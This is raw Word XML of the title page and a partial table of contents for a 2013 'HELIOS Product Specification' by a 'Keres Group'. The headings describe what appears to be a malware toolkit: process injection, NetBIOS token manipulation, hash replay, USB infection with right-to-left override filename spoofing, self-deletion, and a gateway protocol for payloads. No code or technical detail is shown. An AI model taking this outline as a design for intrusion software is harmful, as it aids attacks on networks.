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4B7" w:rsidRDefault="00F762A5" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F762A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>HELIOS Product Specification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF42B9" w:rsidRDefault="00BF42B9" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">©2013 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Keres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB4F37" w:rsidRDefault="00DB4F37" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>www.keresgroup.com</w:t>
      </w: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Default="00CC038F" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC038F" w:rsidRPr="00BF42B9" w:rsidRDefault="00CC038F" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:smallCaps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="17188893"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00F762A5" w:rsidRPr="00F762A5" w:rsidRDefault="00F762A5" w:rsidP="00551FAB">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00F762A5">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00CC038F" w:rsidRDefault="00CC1DF7">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00F762A5">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F762A5" w:rsidRPr="00F762A5">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00F762A5">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc347394077" w:history="1">
            <w:r w:rsidR="00CC038F" w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Contained Files</w:t>
            </w:r>
            <w:r w:rsidR="00CC038F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CC038F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CC038F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394077 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CC038F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00CC038F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CC038F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00CC038F">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78" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>HELIOS Builder and Configuration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394078 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</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79" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Builder Parameters</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394079 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</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80" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Gateway URL List format</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394080 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>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81" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>High-level Binary Structure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394081 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>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82" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Process Injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394082 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>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83" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network Discovery</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394083 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>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84" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>nTM (NetBIOS Token Manipulation Engine)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394084 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</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85" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hash Replay</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394085 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</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86" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Token Encryption</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394086 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</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87" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NT6.0 Token Encryption</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394087 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</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88" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>WMI and TFTP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394088 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</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89" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Token Structures</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394089 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</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0" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Decrypted Token</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394090 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>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91" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>HELIOS USB Wrapper</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394091 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</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2" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>High-Level Overview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394092 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</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3" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Right-to-Left Override (RTO)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394093 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</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4" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Wrapper Icons</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394094 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</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5" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Self-deletion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394095 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</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6" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Template Generator Parameters</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394096 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00CC038F" w:rsidRDefault="00CC038F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc347394097" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>HELIOS Gateway Protocol Specification</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394097 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</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8" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>nTM to Gate Communication (Payload) [1]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394098 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</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099" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Template Requests [2]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394099 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</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100" w:history="1">
            <w:r w:rsidRPr="005403CD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>nTM Tracking [3]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc347394100 \h </w:instrText>
            </w:r>
